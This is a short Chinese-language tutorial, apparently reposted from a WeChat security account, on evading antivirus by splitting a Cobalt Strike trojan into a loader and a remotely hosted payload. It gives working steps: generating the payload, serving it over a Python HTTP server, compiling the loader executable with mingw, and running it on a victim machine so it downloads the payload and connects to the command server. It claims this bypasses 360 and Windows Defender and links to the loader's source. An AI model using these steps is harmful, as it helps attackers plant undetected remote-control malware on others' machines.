===================================
0x01 工具介绍
分离免杀:木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。当然也并非使用自己制作的木马加载器,像白加黑(白程序,黑DLL),这种依靠系统执行DLL的方式,更加有效,但需要找到能够利用的dll文件,还有存在其他的限制,以后有机会分享一下。
实操环境:Linux : CS 服务端(192.168.1.220)Win11 : CS 客户端(192.168.1.212)Win 7 : 实验受害者(192.168.1.57)
0x02 安装与使用
1.Linux开启CS服务端,选择阶段载荷,点击ram,生成 .bin 后缀格式payload。
2. 将生成的payload 放置在linux CS服务端主机上,任意文件夹都可以,在该文件夹中开启http服务(一般使用python就可以了)命令:python3 -m http.server 8880 (这里注意一下python3和python2开启http服务不同,根据自己环境来)。
3. 加载器的准备:使用命令(文件muma.cpp,文章底部链接下载即可):x86_64-w64-mingw32-g++ –static -o power.exe muma.cpp -fpermissive -lws2_32 生成 power.exe 加载器,将加载器上传至受害机Win 7 中。
4. 免杀测试:将加载器power.exe 上传至 受害机后,开启各类EDR,尝试上线CS,命令:power.exe 192.168.1.220 8880 payload_x64.bin ,CS成功上线,且正常执行命令。
5. 下载链接:Github项目地址:https://github.com/xjsafe/ShellCode_Loader原文始发于微信公众号(Web安全工具库):CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论